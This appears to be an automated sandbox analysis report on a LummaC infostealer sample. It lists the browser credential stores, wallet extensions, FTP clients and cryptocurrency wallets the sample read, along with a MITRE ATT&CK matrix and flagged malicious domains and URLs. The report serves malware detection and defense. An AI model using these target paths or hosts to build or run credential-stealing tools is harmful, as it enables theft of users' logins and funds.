Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior

Source: Yara match

File source: Process Memory Space: #Setup.exe PID: 2064, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: #Setup.exe PID: 2064, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	11 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	LSASS Memory	11 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 PowerShell	Logon Script (Windows)	12 Process Injection	3 Obfuscated Files or Information	Security Account Manager	234 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	521 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	221 Virtualization/Sandbox Evasion	Cached Domain Credentials	221 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Process Injection	DCSync	4 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	2 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe	39%	ReversingLabs	Win32.Spyware.Lummastealer
C:\Users\user\AppData\Local\Temp\is-DTHVM.tmp\_isetup\_isdecmp.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-DTHVM.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-SC3PP.tmp\_isetup\_isdecmp.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-SC3PP.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	0%	ReversingLabs
C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)	8%	ReversingLabs
C:\Users\user\AppData\Roaming\ColorStreamLib\is-FS5QT.tmp	8%	ReversingLabs

Source	Detection	Scanner	Label
https://klipvumisui.shop/er	100%	Avira URL Cloud	malware
https://locketsashayz.click/api=u	0%	Avira URL Cloud	safe
https://locketsashayz.click:443/api	0%	Avira URL Cloud	safe
https://cegu.shop/	100%	Avira URL Cloud	malware
https://klipvumisui.shop/int_clp_sha.txtrrF1Kye	100%	Avira URL Cloud	malware
http://www.autohotkey.comCould	0%	Avira URL Cloud	safe
https://dfgh.online/invoker.php?compname=	100%	Avira URL Cloud	malware
rabidcowse.shop	100%	Avira URL Cloud	malware
https://locketsashayz.click/ts	0%	Avira URL Cloud	safe
https://klipvumisui.shop/int_clp_sha.txtL	100%	Avira URL Cloud	malware
https://klipvumisui.shop/=	100%	Avira URL Cloud	malware
https://locketsashayz.click/	0%	Avira URL Cloud	safe
https://locketsashayz.click/apiK	0%	Avira URL Cloud	safe
https://locketsashayz.click/apiZ9NjAAA=~	0%	Avira URL Cloud	safe
cloudewahsj.shop	100%	Avira URL Cloud	malware
https://locketsashayz.click/api.x	0%	Avira URL Cloud	safe
nearycrepso.shop	100%	Avira URL Cloud	malware
abruptyopsn.shop	100%	Avira URL Cloud	malware
https://locketsashayz.click/s	0%	Avira URL Cloud	safe
https://locketsashayz.click/i7	0%	Avira URL Cloud	safe
https://locketsashayz.click/n	0%	Avira URL Cloud	safe
https://locketsashayz.click/i	0%	Avira URL Cloud	safe
https://locketsashayz.click/apiZ9NjAAA=A	0%	Avira URL Cloud	safe
https://locketsashayz.click/apist	0%	Avira URL Cloud	safe
https://locketsashayz.click/pi	0%	Avira URL Cloud	safe
https://dfgh.online	100%	Avira URL Cloud	malware
https://cegu.shop/u	100%	Avira URL Cloud	malware
https://locketsashayz.click/api	0%	Avira URL Cloud	safe
https://dfgh.online/invoker.php?compName=user-PC	100%	Avira URL Cloud	malware
locketsashayz.click	0%	Avira URL Cloud	safe
noisycuttej.shop	100%	Avira URL Cloud	malware
https://locketsashayz.click/apiGuN	0%	Avira URL Cloud	safe
wholersorie.shop	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
cegu.shop	185.161.251.21	true	false	high
klipvumisui.shop	104.21.37.128	true	false	high
locketsashayz.click	188.114.97.3	true	true	unknown
dfgh.online	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
rabidcowse.shop	true	Avira URL Cloud: malware	unknown
cloudewahsj.shop	true	Avira URL Cloud: malware	unknown
nearycrepso.shop	true	Avira URL Cloud: malware	unknown
abruptyopsn.shop	true	Avira URL Cloud: malware	unknown
https://locketsashayz.click/api	true	Avira URL Cloud: safe	unknown
https://klipvumisui.shop/int_clp_sha.txt	false		high
wholersorie.shop	true	Avira URL Cloud: malware	unknown
noisycuttej.shop	true	Avira URL Cloud: malware	unknown
https://cegu.shop/8574262446/ph.txt	false		high
locketsashayz.click	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	#Setup.exe, 00000000.00000003.2225810362.00000000037DF000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2225888215.00000000037DC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU	#Setup.exe, 00000000.00000003.2373901214.0000000003D8B000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2373739539.0000000003CD8000.00000004.00000800.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.exe, 00000007.00000000.2432249699.0000000000FC1000.00000020.00000001.01000000.00000008.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.exe.0.dr	false		high
https://certs.securetrust.com/CA0:	#Setup.exe, 00000000.00000003.2422784890.000000000075F000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2433817040.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.exe.0.dr	false		high
https://duckduckgo.com/ac/?q=	#Setup.exe, 00000000.00000003.2225810362.00000000037DF000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2225888215.00000000037DC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://klipvumisui.shop/er	#Setup.exe, 00000000.00000002.2434984342.00000000007A3000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2422345792.00000000007A3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://locketsashayz.click:443/api	#Setup.exe, 00000000.00000003.2306796493.00000000006EB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
